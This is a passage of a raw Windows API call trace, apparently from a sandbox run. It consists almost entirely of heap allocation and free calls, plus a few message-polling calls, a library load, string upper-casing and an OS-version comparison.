hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.019] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.019] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.019] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0206.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.020] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.020] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.020] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.020] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.020] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0206.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1c38 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1698 [0206.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9df8 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.021] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.021] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.021] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0206.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.022] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0206.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6aa8 | out: hHeap=0x25c0000) returned 1 [0206.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0206.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.022] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.022] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.022] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.022] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.023] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0206.023] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1698 | out: hHeap=0x25c0000) returned 1 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0206.023] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0206.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.024] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0206.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1698 [0206.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cd8 [0206.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0206.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f60 | out: hHeap=0x25c0000) returned 1 [0206.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0206.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0206.024] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0206.024] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.025] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0206.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17f8 [0206.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6558 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.025] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.025] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.026] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.026] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b30f8 [0206.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0206.026] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0206.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.026] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa230 [0206.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cd8 [0206.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9570 [0206.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b30f8 | out: hHeap=0x25c0000) returned 1 [0206.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0206.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9570 | out: hHeap=0x25c0000) returned 1 [0206.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.027] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.027] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0206.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.028] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0206.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0206.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0206.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.028] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0206.028] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0206.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0206.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9bd0 [0206.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0206.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.028] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0206.028] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0206.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9dc8 [0206.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0206.029] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0206.029] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0206.029] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0206.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0206.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.029] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0206.030] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0206.030] PeekMessageW (in: lpMsg=0x8bf050, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf050) returned 0 [0206.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0206.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0206.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0206.030] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0206.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0206.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0206.030] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0206.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0206.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0206.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0206.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0206.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d68 [0206.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0206.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ea0 [0206.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9570 [0206.031] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18f8 [0206.031] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9bd0 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cd8 | out: hHeap=0x25c0000) returned 1 [0206.032] HeapFree (in: hHeap=0x25c0000, 